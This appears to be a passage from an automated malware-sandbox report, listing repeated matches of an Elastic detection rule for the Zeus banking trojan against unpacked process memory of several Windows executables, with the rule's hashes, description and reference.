    Source: 1.3.svchost.exe.2a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.cUKxeliGgCix.exe.3100000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.cUKxeliGgCix.exe.2e42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.cUKxeliGgCix.exe.fe2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.5AFlyarMds.exe.407000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 37.2.cUKxeliGgCix.exe.2d32000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.2a06c00.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 15.2.cUKxeliGgCix.exe.2482000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 23.2.cUKxeliGgCix.exe.3200000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 35.2.cUKxeliGgCix.exe.20c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 19.2.cUKxeliGgCix.exe.2542000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.cUKxeliGgCix.exe.1040000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.27.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.88d400.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 35.2.cUKxeliGgCix.exe.20c0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.42.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.35.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.34.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.38.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 25.2.cUKxeliGgCix.exe.892000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 21.2.cUKxeliGgCix.exe.22d2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 27.2.cUKxeliGgCix.exe.1590000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 15.2.cUKxeliGgCix.exe.2482000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.cUKxeliGgCix.exe.23f2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.cUKxeliGgCix.exe.2e42000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.29.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.41.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.cUKxeliGgCix.exe.3100000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.18.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.40.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.88e000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 27.2.cUKxeliGgCix.exe.1590000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 35.2.cUKxeliGgCix.exe.2062000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
